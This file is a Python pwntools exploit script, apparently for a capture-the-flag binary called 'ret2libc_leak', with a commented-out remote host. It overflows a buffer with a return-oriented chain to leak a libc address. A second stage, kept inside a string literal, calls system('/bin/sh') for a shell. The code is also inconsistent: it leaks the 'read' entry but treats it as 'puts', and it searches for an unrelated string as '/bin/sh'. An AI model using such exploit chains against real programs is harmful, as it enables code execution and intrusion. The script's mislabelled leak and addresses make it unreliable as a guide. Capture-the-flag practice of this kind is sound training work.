55 lines
1.4 KiB
Python
55 lines
1.4 KiB
Python
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
context.binary = elf = ELF("./ret2libc_leak", checksec=False)
|
|
# Change if on server
|
|
|
|
# libc = ELF("libc.so.6", checksec=False)
|
|
# This version of libc has put that ends with 0x00 so it's unprintable in local
|
|
libc = ELF("/usr/lib/libc.so.6", checksec=False)
|
|
OFFSET_TO_RIP = 72
|
|
POP_RDI = 0x4011DB
|
|
RET = 0x40101A
|
|
PUTS_PLT = 0x401060
|
|
# PUTS_PLT = elf.plt['puts']
|
|
# PUTS_GOT = elf.got["puts"]
|
|
PUTS_GOT = elf.got["read"]
|
|
MAIN = 0x401227
|
|
# MAIN = elf.sym['main']
|
|
|
|
BINSH = next(elf.search(b"What book are you looking for?\x00"))
|
|
# BINSH = next(elf.search(b"/bin/sh\x00"))
|
|
p = process(elf.path)
|
|
# p = remote("offsec.m0lecon.it", 13507)
|
|
# -------- Stage 1: leak puts --------
|
|
p.recvuntil(b"looking for?\n")
|
|
stage1 = flat(
|
|
b"A" * OFFSET_TO_RIP,
|
|
p64(POP_RDI),
|
|
p64(PUTS_GOT),
|
|
p64(PUTS_PLT),
|
|
p64(MAIN),
|
|
)
|
|
p.send(stage1)
|
|
p.recvline() # consume "Let me check..."
|
|
# print(p.recvline())
|
|
leaked = p.recvline().strip()
|
|
leak_puts = u64(leaked.ljust(8, b"\x00"))
|
|
log.info(f"puts leak = {leak_puts:#x}")
|
|
libc.address = leak_puts - libc.symbols["puts"]
|
|
log.info(f"libc base = {libc.address:#x}")
|
|
# -------- Stage 2: system("/bin/sh") --------
|
|
"""
|
|
system_addr = libc.symbols["system"]
|
|
p.recvuntil(b"looking for?\n")
|
|
stage2 = flat(
|
|
b"A" * OFFSET_TO_RIP,
|
|
p64(RET),
|
|
p64(POP_RDI),
|
|
p64(0x402008), # addr /bin/sh
|
|
p64(libc.symbols["system"]), # address of system
|
|
)
|
|
p.send(stage2)
|
|
p.interactive()
|
|
# p.recvline()"""
|